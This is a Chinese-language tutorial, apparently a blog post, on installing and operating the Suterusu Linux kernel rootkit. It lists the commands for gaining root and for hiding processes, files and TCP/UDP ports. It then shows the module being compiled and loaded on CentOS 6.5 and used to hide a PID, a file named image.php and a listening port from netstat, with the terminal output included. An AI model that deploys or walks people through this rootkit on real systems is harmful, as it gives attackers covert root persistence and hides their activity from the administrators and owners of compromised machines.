内核级rootkit Suterusu的安装与使用

下载地址:https://github.com/citypw/suterusu/
An LKM rootkit targeting Linux 2.6/3.x on x86(_64), and ARM
功能列表:

Get root
$ ./sock 0
Hide PID
$ ./sock 1 [pid]
Unhide PID
$ ./sock 2 [pid]
Hide TCPv4 port
$ ./sock 3 [port]
Unhide TCPv4 port
$ ./sock 4 [port]
Hide TCPv6 port
$ ./sock 5 [port]
Unhide TCPv6 port
$ ./sock 6 [port]
Hide UDPv4 port
$ ./sock 7 [port]
Unhide UDPv4 port
$ ./sock 8 [port]
Hide UDPv6 port
$ ./sock 9 [port]
Unhide UDPv6 port
$ ./sock 10 [port]
Hide file/directory
$ ./sock 11 [name]
Unhide file/directory
$ ./sock 12 [name]

在CentOS6.5 64位下测试:
1)

[root@vincent suterusu-master]# make linux-x86_64 KDIR=/lib/modules/$(uname -r)/build //注意这里是 linux-x86_64
make ARCH=x86_64 EXTRA_CFLAGS="-D_CONFIG_X86_64_ " -C /lib/modules/2.6.32-642.1.1.el6.x86_64/build M=/tmp/suterusu-master modules
make[1]: Entering directory `/usr/src/kernels/2.6.32-642.1.1.el6.x86_64'
CC [M] /tmp/suterusu-master/main.o
CC [M] /tmp/suterusu-master/util.o
CC [M] /tmp/suterusu-master/module.o
LD [M] /tmp/suterusu-master/suterusu.o
Building modules, stage 2.
MODPOST 1 modules
CC /tmp/suterusu-master/suterusu.mod.o
LD [M] /tmp/suterusu-master/suterusu.ko.unsigned
NO SIGN [M] /tmp/suterusu-master/suterusu.ko
make[1]: Leaving directory `/usr/src/kernels/2.6.32-642.1.1.el6.x86_64'

2)

[root@vincent suterusu-master]# gcc sock.c -o sock
sock.c: 在函数‘main’中:
sock.c:205: 警告:隐式声明与内建函数‘strlen’不兼容
sock.c:220: 警告:隐式声明与内建函数‘strlen’不兼容

3)

[root@vincent suterusu-master]# insmod suterusu.ko

隐藏进程:

[root@vincent suterusu-master]# ./sock 1 5542
Hiding PID 5542

隐藏文件:
注意文件的隐藏只是针对文件名,也就是比如你想隐藏文件x,那么所有目录下的x都会被隐藏

[root@vincent suterusu-master]# ./sock 11image.php
Hiding file/dir ../image.php

隐藏连接:

[root@vincent suterusu-master]# netstat -ano | grep 49745
tcp 0 0 0.0.0.0:49745 0.0.0.0:* LISTEN off (0.00/0/0)
[root@vincent suterusu-master]# ./sock 3 49745
Hiding TCPv4 port 49745
[root@vincent suterusu-master]# netstat -ano | grep 49745
[root@vincent suterusu-master]#